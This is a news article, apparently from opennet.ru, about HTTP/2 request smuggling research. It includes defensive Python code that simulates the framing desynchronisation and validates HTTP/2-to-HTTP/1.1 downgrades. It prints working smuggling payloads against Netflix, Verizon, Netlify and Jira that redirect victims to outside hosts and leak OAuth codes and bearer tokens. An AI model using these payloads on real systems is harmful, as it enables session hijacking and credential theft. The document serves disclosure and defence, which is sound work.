New attack on frontend-backend systems that allows wedging into other users' requests

Web systems in which the frontend accepts connections over HTTP/2 and forwards them to the backend over HTTP/1.1 are exposed to a new variant of the "HTTP Request Smuggling" attack. By sending specially crafted requests, an attacker can wedge into the content of requests from other users that are processed over the same frontend-to-backend stream. The attack can be used to inject malicious JavaScript code into a session with a legitimate site, bypass access control systems and intercept authentication parameters.

The problem affects web proxies, load balancers, web accelerators, content delivery systems and other configurations in which requests are relayed from a frontend to a backend. The author of the research demonstrated the possibility of attacking systems of Netflix, Verizon, Bitbucket, Netlify CDN and Atlassian, and received 56 thousand dollars in bug bounty programs for identifying the vulnerabilities. The problem was also confirmed in F5 Networks products. The problem partially affects mod_proxy in the Apache HTTP server (CVE-2021-33193); a fix is expected in version 2.4.49 (the developers were notified of the problem in early May and were given 3 months to fix it). In nginx, the ability to specify the "Content-Length" and "Transfer-Encoding" headers simultaneously was blocked in the latest release (1.21.1). Attack tools have already been included in the Burp toolkit and are available in the form of the Turbo Intruder extension.

The operating principle of the new method for wedging requests into traffic is similar to the vulnerability identified by the same researcher two years ago, but that one was limited to frontends accepting requests over HTTP/1.1. Recall that in frontend-backend schemes, user requests are received by an additional node, the frontend, which establishes a long-lived TCP connection to the backend that actually processes the requests. Requests from different users are usually transmitted over this shared connection, following one another in a chain, delimited by means of the HTTP protocol.

The classic "HTTP Request Smuggling" attack relies on frontends and backends interpreting the HTTP headers "Content-Length" (which gives the total size of the data in the request) and "Transfer-Encoding: chunked" (which allows the data to be sent in pieces) differently. For example, if the frontend supports only "Content-Length" and ignores "Transfer-Encoding: chunked", an attacker can send a request containing both a "Content-Length" and a "Transfer-Encoding: chunked" header, with the size in "Content-Length" not matching the size of the chunked chain. In this case the frontend processes and forwards the request according to "Content-Length", while the backend waits for the chunked body to complete according to "Transfer-Encoding: chunked", so the remaining tail of the attacker's request ends up at the beginning of the next request transmitted from another user.

Unlike the text-based HTTP/1.1 protocol, which is parsed line by line, HTTP/2 is a binary protocol and handles data blocks of a predetermined size. HTTP/2 does, however, use pseudo-headers that correspond to ordinary HTTP headers. When the backend is reached over HTTP/1.1, the frontend translates these pseudo-headers into equivalent HTTP/1.1 headers. The problem is that the backend decides how to parse the stream based on the HTTP headers set by the frontend, without any information about the parameters of the original request.

In particular, the "content-length" and "transfer-encoding" values can be passed in the form of pseudo-headers even though they are not used in HTTP/2, since the size of all data is determined in a separate field. Yet when the HTTP/2 request is converted to HTTP/1.1, these headers are passed through and can confuse the backend. There are two main attack variants, H2.TE and H2.CL, in which the backend is misled by an incorrect transfer-encoding or content-length value that does not match the actual size of the request body the frontend received over HTTP/2.


An example of the H2.CL attack is specifying an incorrect size in the content-length pseudo-header when sending an HTTP/2 request to Netflix. This request leads to the addition of an equivalent Content-Length HTTP header when the backend is contacted over HTTP/1.1, but since the size in Content-Length is smaller than the actual one, part of the data in the tail is processed as the beginning of the next request.

For example, the HTTP/2 request:

:method POST
:path /n
:authority www.netflix.com
content-length 4

abcdGET /n HTTP/1.1
Host: 02.rs?x.netflix.com
Foo: bar

results in the following request being sent to the backend:

POST /n HTTP/1.1
Host: www.netflix.com
Content-Length: 4

abcdGET /n HTTP/1.1
Host: 02.rs?x.netflix.com
Foo: bar

Since Content-Length has the value 4, the backend accepts only "abcd" as the body of the request, and the remainder "GET /n HTTP/1.1 ..." is processed as the beginning of the next request, which belongs to another user. Accordingly, the stream becomes desynchronised, and the response to that next request is the result of processing the dummy request. In the case of Netflix, specifying a third-party host in the "Host:" header of the dummy request caused the response "Location: https://02.rs?x.netflix.com/n" to be returned to the user and allowed arbitrary content to be sent to the client, including running the attacker's JavaScript code in the context of the Netflix site.

The second variant (H2.TE) involves substituting the "Transfer-Encoding: chunked" header. Using the transfer-encoding pseudo-header in HTTP/2 is prohibited by the specification, and requests containing it must be treated as malformed. Despite this, some HTTP/2 implementations do not take this requirement into account and allow the transfer-encoding pseudo-header in HTTP/2, which is converted into the equivalent HTTP header. When a "Transfer-Encoding" header is present, the backend may give it priority and parse the data piece by piece in "chunked" mode, using blocks of varying size in the format "{size}\r\n{block}\r\n{size}\r\n{block}\r\n0", regardless of the original division by total size.

The presence of this variant was demonstrated on the example of Verizon. The problem affected the authentication portal and content management system, which is also used on sites such as Huffington Post and Engadget. For example, the client's HTTP/2 request:

:method POST
:path /identity/XUI
:authority id.b2b.oath.com
transfer-encoding chunked

0

GET /oops HTTP/1.1
Host: psres.net
Content-Length: 10

x=

leads to the following HTTP/1.1 request being sent to the backend:

POST /identity/XUI HTTP/1.1
Host: id.b2b.oath.com
Content-Length: 66
Transfer-Encoding: chunked

0

GET /oops HTTP/1.1
Host: psres.net
Content-Length: 10

x=

The backend, in turn, ignored the "Content-Length" header and split the stream according to "Transfer-Encoding: chunked". In practice, the attack made it possible to redirect users' requests to the attacker's site, including intercepting requests related to OAuth authentication, whose parameters appeared in the Referer header, as well as simulating an authentication session and causing the user's system to send credentials to the attacker's host.

GET /b2blanding/show/oops HTTP/1.1
Host: psres.net
Referer: https://id.b2b.oath.com/?…&code=secret

GET / HTTP/1.1
Host: psres.net
Authorization: Bearer eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik
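The framing disagreement in both examples above (Netflix H2.CL and Verizon H2.TE) can be reproduced on the bytes the backend receives. The following Python is an added example, not code from the article or from the research it reports: it frames the same byte stream with a Content-Length-first policy, the Transfer-Encoding-first policy RFC 7230 requires, and a "strict" policy that refuses a request carrying both headers (the behaviour the article attributes to nginx 1.21.1). The two attack requests are the ones quoted above; the victim request and the policy names are constructed for this example.

```python
# Added example (not from the article or the research it reports): framing the same
# byte stream with several HTTP/1.1 policies, to show how a backend that trusts the
# frontend's headers desynchronises, and how a strict backend refuses the request.
from typing import List, Tuple

Request = Tuple[str, List[Tuple[str, str]], bytes]  # (request line, headers, body)


def _parse_head(data: bytes):
    """Split one request head off `data`; None if the terminating blank line is not there yet."""
    end = data.find(b"\r\n\r\n")
    if end == -1:
        return None
    lines = data[:end].decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, data[end + 4:]


def _read_chunked(data: bytes):
    """Consume a chunked body; return (body, rest), or None if more bytes are needed."""
    body = b""
    while True:
        nl = data.find(b"\r\n")
        if nl == -1:
            return None
        size = int(data[:nl].split(b";")[0].strip(), 16)
        data = data[nl + 2:]
        if size == 0:                    # last chunk; trailers are not handled here
            return (body, data[2:]) if len(data) >= 2 else None
        if len(data) < size + 2:
            return None
        body += data[:size]
        data = data[size + 2:]


def split_stream(data: bytes, policy: str):
    """Carve `data` into requests under one of three framing policies:
    'cl'     frame by Content-Length even if Transfer-Encoding is present
    'te'     prefer Transfer-Encoding: chunked, as RFC 7230 section 3.3.3 requires
    'strict' like 'te', but reject a request carrying both headers (the behaviour the
             article describes nginx 1.21.1 adopting)
    Returns (complete requests, bytes left over that wait for the next client's data)."""
    requests: List[Request] = []
    while data:
        head = _parse_head(data)
        if head is None:
            break
        request_line, headers, rest = head
        hdr = dict(headers)              # last duplicate wins; enough for this demo
        has_te = hdr.get("transfer-encoding", "").lower() == "chunked"
        has_cl = "content-length" in hdr
        if policy == "strict" and has_te and has_cl:
            raise ValueError("ambiguous framing: Content-Length and Transfer-Encoding both present")
        if has_te and policy in ("te", "strict"):
            parsed = _read_chunked(rest)
        else:
            n = int(hdr.get("content-length", "0"))
            parsed = (rest[:n], rest[n:]) if len(rest) >= n else None
        if parsed is None:               # body incomplete: keep the whole request buffered
            break
        body, data = parsed
        requests.append((request_line, headers, body))
    return requests, data


# The Netflix (H2.CL) and Verizon (H2.TE) requests as the backend saw them, per the article.
H2_CL = (b"POST /n HTTP/1.1\r\nHost: www.netflix.com\r\nContent-Length: 4\r\n\r\n"
         b"abcdGET /n HTTP/1.1\r\nHost: 02.rs?x.netflix.com\r\nFoo: bar")
H2_TE = (b"POST /identity/XUI HTTP/1.1\r\nHost: id.b2b.oath.com\r\n"
         b"Content-Length: 66\r\nTransfer-Encoding: chunked\r\n\r\n"
         b"0\r\n\r\nGET /oops HTTP/1.1\r\nHost: psres.net\r\nContent-Length: 10\r\n\r\nx=")
# Constructed: an unrelated user's request that arrives next on the shared connection.
VICTIM = b"GET /account HTTP/1.1\r\nHost: www.netflix.com\r\nCookie: session=VICTIM\r\n\r\n"


def demo_desync() -> Request:
    """The request a Content-Length backend assembles from the attacker's leftover plus the victim's bytes."""
    done, leftover = split_stream(H2_CL, "cl")
    # done: one POST with body b"abcd"; leftover: an incomplete head starting "GET /n ..."
    merged, _ = split_stream(leftover + VICTIM, "cl")
    return merged[0]


def rejects_ambiguous(data: bytes) -> bool:
    """True if the strict policy refuses `data` before splitting it."""
    try:
        split_stream(data, "strict")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    line, headers, _ = demo_desync()
    print(line)                                   # attacker-chosen request line
    print(dict(headers)["cookie"])                # the victim's header now attached to it
    print(rejects_ambiguous(H2_TE))               # True
```

Running the Verizon bytes through `split_stream(H2_TE, "te")` yields one empty-bodied POST and leaves the "GET /oops" request buffered waiting for eight more body bytes, exactly the state the article describes before the next user's request arrives; the `"cl"` policy consumes all 66 bytes as one body instead. The desynchronisation is a disagreement between the two sides, so the fix has to remove the disagreement: either the backend rejects ambiguous framing, or the frontend never produces it.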

To attack HTTP/2 implementations that do not allow the transfer-encoding pseudo-header to be specified, another method was proposed: the "Transfer-Encoding" header is smuggled by appending it to other pseudo-headers, separated by a newline character (when converting to HTTP/1.1, this produces two separate HTTP headers).

For example, Atlassian Jira and Netlify CDN (used to serve the Mozilla start page in Firefox) were affected by this problem. In particular, the HTTP/2 request:

:method POST
:path /
:authority start.mozilla.org
foo b\r\ntransfer-encoding: chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: evil-netlify-domain\r\n
Content-Length: 5\r\n
\r\n
x=

led to the following HTTP/1.1 request being sent to the backend:

POST / HTTP/1.1\r\n
Host: start.mozilla.org\r\n
Foo: b\r\n
Transfer-Encoding: chunked\r\n
Content-Length: 71\r\n
\r\n
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: evil-netlify-domain\r\n
Content-Length: 5\r\n
\r\n
x=

Another option for substituting the "Transfer-Encoding" header is to append it to the name of another pseudo-header or to the request method line. For example, when accessing Atlassian Jira, a pseudo-header named "foo: bar\r\ntransfer-encoding" with the value "chunked" resulted in the HTTP headers "foo: bar" and "transfer-encoding: chunked" being added, and specifying the ":method" pseudo-header with the value "GET / HTTP/1.1\r\nTransfer-encoding: chunked" was translated into "GET / HTTP/1.1\r\ntransfer-encoding: chunked".
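All of the vectors described above (a forwarded transfer-encoding field, a content-length that does not match the body, and CR/LF injected into a field name, a field value or :method) are caught by the same validation on the frontend, at the point where the decoded HTTP/2 HEADERS block is turned into an HTTP/1.1 request. The following Python function is an added example, not code from the article or from any of the affected products. It assumes the frontend holds the decoded header list and the complete DATA payload, and the checks it applies are those of RFC 7540: connection-specific fields and a content-length that disagrees with the DATA length make the message malformed, and control octets in field names or values are rejected. The function and constant names are this example's own; the Jira :authority is a placeholder because the article does not give one.

```python
# Added example (not from the article or any affected product): the validation a
# frontend should apply when turning an HTTP/2 request into an HTTP/1.1 request.
import re

# Field names and methods must be HTTP tokens: no whitespace, no ':', no controls.
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
_CTL = re.compile(r"[\x00-\x1f\x7f]")       # CR, LF, NUL and other control octets
# RFC 7540 section 8.1.2.2: connection-specific fields make an HTTP/2 message malformed.
_CONNECTION_SPECIFIC = {"connection", "keep-alive", "proxy-connection",
                        "transfer-encoding", "upgrade"}
_PSEUDO = {":method", ":path", ":authority", ":scheme"}


class MalformedRequest(ValueError):
    """Raised for anything the frontend must answer with an error instead of forwarding."""


def downgrade_h2_to_h1(h2_headers, body: bytes) -> bytes:
    """Build the HTTP/1.1 request to forward for one HTTP/2 request.
    `h2_headers`: the decoded HEADERS block as (name, value) pairs.
    `body`: the concatenated DATA payload; the frontend knows its exact length."""
    pseudo, regular = {}, []
    for name, value in h2_headers:
        if _CTL.search(name) or _CTL.search(value):
            raise MalformedRequest(f"control character in field {name!r}")
        if name.startswith(":"):
            if name not in _PSEUDO or name in pseudo:
                raise MalformedRequest(f"unexpected or repeated pseudo-header {name!r}")
            pseudo[name] = value
        elif not _TOKEN.match(name) or name != name.lower():
            raise MalformedRequest(f"invalid field name {name!r}")
        else:
            regular.append((name, value))
    for required in (":method", ":path", ":authority"):
        if required not in pseudo:
            raise MalformedRequest(f"missing {required}")
    method, path = pseudo[":method"], pseudo[":path"]
    if not _TOKEN.match(method):
        raise MalformedRequest(f"invalid method {method!r}")
    if not path or any(ch.isspace() for ch in path):
        raise MalformedRequest(f"invalid :path {path!r}")

    out = [("host", pseudo[":authority"])]
    for name, value in regular:
        if name in _CONNECTION_SPECIFIC:
            raise MalformedRequest(f"connection-specific field {name!r} in HTTP/2")
        if name == "host":
            continue                     # :authority already supplied it
        if name == "content-length":
            # RFC 7540 section 8.1.2.6: must equal the DATA payload length, else malformed.
            if not value.isdigit() or int(value) != len(body):
                raise MalformedRequest(f"content-length {value} != body length {len(body)}")
            continue                     # regenerated below from the real length
        out.append((name, value))
    # The frontend, not the client, decides the HTTP/1.1 framing.
    if body or method in ("POST", "PUT", "PATCH"):
        out.append(("content-length", str(len(body))))
    head = "\r\n".join([f"{method} {path} HTTP/1.1"] + [f"{n}: {v}" for n, v in out])
    return (head + "\r\n\r\n").encode("latin-1") + body


def rejection_reason(h2_headers, body: bytes):
    """The MalformedRequest message, or None if the request downgrades cleanly."""
    try:
        downgrade_h2_to_h1(h2_headers, body)
    except MalformedRequest as exc:
        return str(exc)
    return None


# The article's vectors, as (label, decoded header list, DATA payload).
ARTICLE_VECTORS = [
    ("Netflix H2.CL", [(":method", "POST"), (":path", "/n"), (":authority", "www.netflix.com"),
                       ("content-length", "4")],
     b"abcdGET /n HTTP/1.1\r\nHost: 02.rs?x.netflix.com\r\nFoo: bar"),
    ("Verizon H2.TE", [(":method", "POST"), (":path", "/identity/XUI"),
                       (":authority", "id.b2b.oath.com"), ("transfer-encoding", "chunked")],
     b"0\r\n\r\nGET /oops HTTP/1.1\r\nHost: psres.net\r\nContent-Length: 10\r\n\r\nx="),
    ("Netlify CRLF in value", [(":method", "POST"), (":path", "/"), (":authority", "start.mozilla.org"),
                               ("foo", "b\r\ntransfer-encoding: chunked")], b"0\r\n\r\nGET / HTTP/1.1\r\n"),
    ("Jira CRLF in :method", [(":method", "GET / HTTP/1.1\r\nTransfer-encoding: chunked"),
                              (":path", "/"), (":authority", "jira.example")], b""),  # placeholder authority
]
# Constructed: an ordinary request, to show the clean path.
CLEAN = [(":method", "GET"), (":path", "/account"), (":authority", "www.netflix.com"),
         ("cookie", "session=VICTIM")]

if __name__ == "__main__":
    for label, headers, body in ARTICLE_VECTORS:
        print(f"{label}: {rejection_reason(headers, body)}")
    print(downgrade_h2_to_h1(CLEAN, b""))
```

The essential design choice is that the Content-Length the backend sees is computed from the DATA frames the frontend actually received, never copied from the client, and that transfer-encoding is dropped as an error rather than forwarded; that removes both the H2.CL and H2.TE disagreements regardless of how the backend parses. The control-octet check covers the newline-splicing variants, since a single HTTP/2 field can only become two HTTP/1.1 header lines if a CR or LF survives the translation.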

The researcher who identified the problem also proposed a request tunneling technique for attacking frontends that open a separate connection to the backend for each IP address and do not mix traffic from different users. This technique does not allow interfering with other users' requests, but it makes it possible to poison a shared cache, affecting the processing of other requests, and to substitute internal HTTP headers used to pass service information from the frontend to the backend (for example, when authentication is performed on the frontend side, such headers may pass information about the current user to the backend). As an example of applying the method in practice, cache poisoning made it possible to gain control over pages in the Bitbucket service.

Source: opennet.ru
